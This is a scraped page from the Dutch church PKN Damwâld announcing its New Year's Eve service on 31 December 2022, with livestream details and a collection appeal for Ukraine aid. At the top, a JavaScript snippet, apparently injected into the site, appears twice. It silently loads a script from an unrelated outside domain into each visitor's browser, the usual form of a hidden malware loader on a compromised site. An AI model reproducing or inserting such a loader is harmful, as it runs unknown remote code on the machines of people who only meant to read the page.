;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Oudejaarsdag - PKN Damwâld
zaterdag 31 december 2022
19:30 uur
Vanwege een lastige ' webbug' wordt abusievelijk de 'zaterdagse' oudejaarsdienst als zondagse dienst aangegeven! Excuses voor de overlast!

Oudejaarsdag

Informatie

Voorganger:Dhr. J.Y. van der Wal
Mededeling:Vanwege een lastige ' webbug' wordt abusievelijk de 'zaterdagse' oudejaarsdienst als zondagse dienst aangegeven! Excuses voor de overlast!
LivestreamDienst terugkijken
Bekijk op Youtube
Locatie: de Ontmoeting Foarwei 38, 9104 BX Damwâld
Collecte informatie
Uitganscollecte: Collecte kerk in actie 2022 Werelddiaconaat

Collecte 31 december (22125)
De oorlog in Oekraïne betekent onbeschrijflijk veel leed voor de mensen daar. Ons hart en onze gebeden gaan naar hen uit! Kerk in Actie geeft via lokale kerken en partnerorganisaties in Oekraïne hulp aan de vele vluchtelingen, die op zoek zijn naar veiligheid in de buurlanden. De kracht van kerken is dat die overal onderweg opvangmogelijkheden hebben. In elk dorp zijn er plekken ingericht voor onderdak en wordt er voedsel en kleding uitgereikt. Uw steun voor de slachtoffers van het oorlogsgeweld is hard nodig. Met uw bijdrage steunt u de noodhulp van Kerk in Actie en krijgen vluchtelingen een slaapplaats en een noodpakket met voedsel, zeep, handdoek en een slaapzak.

https://kerkinactie.protestantsekerk.nl/projecten/noodhulp-oekraine/